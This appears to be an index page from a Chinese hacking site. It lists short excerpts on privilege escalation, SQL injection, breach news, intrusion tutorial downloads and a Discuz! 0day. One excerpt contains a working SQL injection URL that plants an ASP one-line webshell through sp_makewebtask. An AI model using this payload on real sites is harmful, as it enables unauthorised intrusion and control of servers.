FileZilla Server提权实例演示
前段时间lengf牛写了篇文章关于FileZilla Server的提权测试,俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器,咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢,大家有没有想到G6FTP如何提权的, G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。...
SA权限用sp_makewebtask直接在web目录里写入一句话
示范: http://127.0.0.1/XXXasp?id=3389';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';-- 前提是注入点是sa权限 用sp_makewebtask直接在web目录里写入一句话马: 条件是要sa权限和站点的web路...
安徽国库支付系统被黑客涮库
从2010年2月份开始,(安徽)黄山市黄山区财政局国库集中支付网络服务器被黑客入侵, 被他人增加了30多名新用户。直到近日,该区财政局网络管理员才发现,随即报警。目前, 警方已督促该区财政局尽快修复系统,由于案件正在侦破中,至于黑客入侵是否对国库资 金造成损失,警方表示尚不能透露。 经警方调查,发现该服务器竟然从去年2月起,至少被30余名黑客入侵,系统中被他人增加了30余名新用户。 据知情人士介绍...
缘分技术论坛的VIP教程
http://u.115.com/file/f73a707886 VIP入侵系列教程第一课.rar http://u.115.com/file/f7cb7065a VIP入侵系列教程第二课.rar http://u.115.com/file/f799279925 vip入侵系列教程第三课.rar http://u.115.com/file/f7bf95e6b5 vip入侵系列教程第四课.rar h...
老文赏:SQL注入思路与手工猜解大进阶
什么叫SQL注入? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入的思路 思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结一下SQL注入入侵的总体的思路: ...
检测某IDC服务器 从入侵提权谈主机防御
文章作者:过客 前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。 目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u 目标网站:Ecshop2.7x 提权: 通常步骤 1、 上传asp webshell检测可用组件,端口,目录。 2、 上传aspx webhsell 测试执行命令,获取进程、服务、端口信息 入手 Echo...
2011黑帽大会:由黑客操控的世界
7 月30日至8月4日,一年一度的黑帽大会在拉斯维加斯召开。黑帽大会一直被公认为是信息安全领域的顶级盛会,在预测与描述未来信息安全形势的能力方面,它的权威性更是独一无二的。本届黑帽大会依旧没有让参与者与围观者失望,它再次汇聚了来自世界各地的企业、政府、学术界及“地下”信息安全组织的思想领袖。在这个专业与技术水平极高的平台上,黑客们正在向人们展示操控世界的技术。你的房子可能被攻破 植物大战僵尸不仅仅...
流氓软件,病毒木马瞄上安卓平台
近日,很多购买水货安卓手机的用户会发现,当手机到手后,已经装了很多形形色色的软件。 但是比如手机qq,uc浏览器之类的,不能删除,也不能升级,这都还好,要命的是还有大 量的不明来路的软件,悄悄在后台运行,不仅非常耗电,甚至让电池极度的发热。 而这一切问题的根源,则全部由当前火热的手机系统——android系统引起。根据调查数据显示 ,在亚洲市场,Android的市场份额已经超越了Symbian,成...
Discuz! X1.5爆0day漏洞 建议升级2.0版本
近日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞,据说利用此漏洞可以上传php木马。建议Discuz! X1.5升级2.0版本。 以下为黑客公布的Discuz! X1.5 0day 利用方法: 把下面内容保存为exp.php 在php环境下运行 php exp.php <?php print_r(' +-------------------...
backtrack常用渗透命令
whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通。 dig 域名/ip 查看域名解析的详细信息。 host -l 域名 dns服务器 传输zone。 查询信息的网站: http://centralops.net http://www.dnsstuff.com http://serversniff.net http://news.netcraft.com...